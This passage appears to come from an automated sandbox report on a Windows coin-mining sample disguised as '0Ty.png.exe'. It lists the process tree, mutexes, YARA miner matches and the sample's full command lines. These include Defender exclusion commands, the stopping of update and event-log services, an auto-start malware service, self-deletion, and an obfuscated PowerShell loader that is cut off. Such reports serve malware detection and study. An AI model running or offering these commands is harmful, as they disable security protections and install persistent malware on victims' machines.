            Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001400027D064_2_00000001400027D0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8ADD7866_2_00007FFD9B8ADD78
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE34966_2_00007FFD9B8AE349
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9BB2354266_2_00007FFD9BB23542
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9BB230D166_2_00007FFD9BB230D1
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB483CD867_3_0000014ECB483CD8
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB47D51067_3_0000014ECB47D510
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB471FF467_3_0000014ECB471FF4
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4B48D867_2_0000014ECB4B48D8
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AE11067_2_0000014ECB4AE110
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4A2BF467_2_0000014ECB4A2BF4
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140001CF068_2_0000000140001CF0
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002D5468_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_000000014000127468_2_0000000140001274
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_000000014000243468_2_0000000140002434
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_00000001400031D868_2_00000001400031D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC611FF469_3_00000225DC611FF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC623CD869_3_00000225DC623CD8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC61D51069_3_00000225DC61D510
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC642BF469_2_00000225DC642BF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6548D869_2_00000225DC6548D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64E11069_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC672BF469_2_00000225DC672BF4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6848D869_2_00000225DC6848D8
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67E11069_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0AB1FF470_3_00000202C0AB1FF4
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0AC3CD870_3_00000202C0AC3CD8
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0ABD51070_3_00000202C0ABD510
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE2BF470_2_00000202C0AE2BF4
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AF48D870_2_00000202C0AF48D8
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AEE11070_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612DD51071_3_000002A6612DD510
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612D1FF471_3_000002A6612D1FF4
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612E3CD871_3_000002A6612E3CD8
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130E11071_2_000002A66130E110
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A661302BF471_2_000002A661302BF4
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A6613148D871_2_000002A6613148D8
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDD1FF472_3_000002BAAEDD1FF4
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDDD51072_3_000002BAAEDDD510
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDE3CD872_3_000002BAAEDE3CD8
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE02BF472_2_000002BAAEE02BF4
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0E11072_2_000002BAAEE0E110
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE148D872_2_000002BAAEE148D8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB53CD873_3_00000248FFB53CD8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB4D51073_3_00000248FFB4D510
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB41FF473_3_00000248FFB41FF4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140001CF073_2_0000000140001CF0
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140002D5473_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000000014000243473_2_0000000140002434
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000001400031D873_2_00000001400031D8
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000000014000127473_2_0000000140001274
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000024880602BF473_2_0000024880602BF4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060E11073_2_000002488060E110
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000248806148D873_2_00000248806148D8
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\ihddniqxcjeb.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: unknownProcess created: Commandline size = 5337
            Source: unknownProcess created: Commandline size = 5389
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@105/17@1/2
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,68_2_0000000140002D54
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,73_2_0000000140002D54
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001614 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,24_2_0000000140001614
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001984 FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,24_2_0000000140001984
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7920:120:WilError_03
            Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\gohkfyvqbpmecnid
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7928:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7784:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7888:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7492:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djuimxe0.3el.ps1Jump to behavior
            Source: 0Ty.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\0Ty.png.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 0Ty.png.exeVirustotal: Detection: 65%
            Source: 0Ty.png.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\0Ty.png.exeFile read: C:\Users\user\Desktop\0Ty.png.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\0Ty.png.exe "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HGLZSDMZ"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 